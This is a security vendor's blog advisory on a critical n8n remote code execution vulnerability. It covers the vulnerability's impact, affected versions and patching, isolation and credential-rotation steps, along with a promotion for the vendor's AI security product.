Published: January 22, 20263 min read

Critical Advisory: n8n RCE Vulnerability (CVE-2026-21858) Exposes Automation Pipelines

A critical RCE (CVSS 10.0) in n8n exposes automation pipelines and stored secrets to full compromise—upgrade to version 1.36.1 immediately.

By Secure.com
Critical Advisory: n8n RCE Vulnerability (CVE-2026-21858) Exposes Automation Pipelines

Urgent: Unpatched n8n instances are open doors to your entire tech stack.

TL;DR

  • Threat: There is a critical RCE flaw (CVSS 10. 0) found in n8n through which hackers can hack into the host.
  • Risk: All AWS, Stripe, Slack and Salesforce API keys are kept within n8n which serves like a brain for all activities; compromising it may allow lateral movement throughout your environment.
  • Solution: Immediately upgrade to v1. 36. 1. In case you are unable to apply the patch, either take down the instance or ensure that it is completely separated using a WAF/VPN.

The “Keys to the Kingdom” Vulnerability

For many DevOps and IT teams, n8n is the invisible engine that runs the business—automating everything from customer onboarding to infrastructure provisioning. Because of this role, n8n instances are often trusted with highly sensitive credentials: database passwords, cloud provider API keys, and OAuth tokens.

This is why CVE-2026-21858 is a nightmare scenario.

This critical RCE flaw allows an attacker to bypass authentication safeguards, execute arbitrary code, and manipulate workflows. Once inside, they don't just compromise the n8n server; they gain access to every service that n8n is connected to.

This isn't just an application vulnerability; it is a supply chain bridge into your private data.

Technical Breakdown

  • Primary Vulnerability: CVE-2026-21858
  • Severity: Critical (CVSS v3.1: 10.0)
  • Vector: Remote Code Execution (RCE) via unauthenticated or low-privilege vectors (depending on configuration).
  • Affected Versions: n8n versions ≤ 1.36.0
  • Fixed Version: n8n version 1.36.1

Secondary Vulnerabilities Identified:

Alongside the primary RCE, three high-severity vulnerabilities were also disclosed:

  • CVE-2025-68613 (High): Authentication bypass risks.
  • CVE-2025-68668 (High): Privilege escalation vectors.
  • CVE-2026-21877 (High): Workflow manipulation flaws.

The Impact: Why This Matters

If exploited, an attacker can:

  1. Execute System Commands: Gain full shell access to the host OS running n8n.
  2. Steal Secrets: Exfiltrate the encrypted credentials stored within n8n workflows (AWS keys, database strings, SaaS tokens).
  3. Weaponize Workflows: Modify existing automations to redirect sensitive data (e.g., sending customer leads to a malicious server) or deploy malware to connected downstream systems.
  4. Lateral Movement: Use the n8n host as a pivot point to attack internal networks that are otherwise reachable only via the trusted automation server.

Immediate Remediation Plan

It is mandatory that your security personnel act as if there is a real fire during this drill.

1. Patch Immediately

 Update your n8n Docker containers or npm packages to v1. 36. 1+ immediately.

Note: Verify the integrity of your database backups before applying the update.

2. Isolate & Restrict

If you cannot upgrade immediately:

  • Take it offline: If the instance is public-facing, restrict access to a VPN or internal IP range immediately.
  • WAF Rules: Block all external webhooks unless absolutely necessary and verify the source IPs.

3. Rotate Credentials (Critical)

If your instance was exposed to the internet and unpatched, assume your stored credentials are compromised.

  • Rotate API keys for all services connected to n8n (Slack, GitHub, Google Drive, AWS, etc.).
  • Revoke and reissue OAuth tokens used in your workflows.

4. Audit Execution Logs

Review n8n execution logs for workflows you do not recognize, or legitimate workflows that have been modified to include "HTTP Request" nodes sending data to unknown external IPs.

The Secure.com Perspective

This n8n advisory highlights the dangerous gap in the "Shift-Left" philosophy. You can scan your code all you want, but if a third-party tool you rely on for operations (like n8n) introduces a runtime RCE, your static checks won't save you.

This is the Headcount Gap Crisis in action - security teams lack the capacity to respond to every critical vulnerability at the speed threats demand. Security teams are drowning in thousands of low-fidelity alerts, while a critical infrastructure flaw like this requires immediate, high-context attention.

How a Digital Security Teammate Helps

Instead of waiting for a human analyst to read this blog post, Secure.com's Digital Security Teammate would have already:

  • Mapped the Asset: Identified all running n8n instances in your cloud environment via the unified data fabric.
  • Matched the Threat: Correlated CVE-2026-21858 against your specific version numbers.
  • Contextualized the Risk: Flagged the instance as "Critical" not just because of the CVSS score, but because it detects high-value IAM roles attached to that workload.
  • Drafted the Remediation: Created a ticket with the upgrade command and a list of credentials that need rotation. Awaits human approval before execution - maintaining the human-in-the-loop control that security leaders require.

Similar Blogs

Why Shift-Left Security Alone Is Insufficient — And Why AI Must Become a Continuous Layer of Defense
Published: January 21, 2026

Why Shift-Left Security Alone Is Insufficient — And Why AI Must Become a Continuous Layer of Defense

Pre-production checks cannot secure a dynamic cloud. Find out how AI bridges the visibility gap between deployment and defense to catch what Shift-Left misses.

Read More →
How to Prevent Cloud Misconfiguration for Secure IT
Published: January 20, 2026

How to Prevent Cloud Misconfiguration for Secure IT

Misconfigurations are the #1 cause of cloud breaches—discover how to move from "finding" them to "fixing" them with AI-driven guardrails.

Read More →
Google Gemini Privacy Controls Bypassed via Malicious Calendar Invites
Published: January 20, 2026

Google Gemini Privacy Controls Bypassed via Malicious Calendar Invites

A new vulnerability allowed attackers to manipulate Google Gemini into leaking private data simply by embedding malicious text in a calendar invitation.

Read More →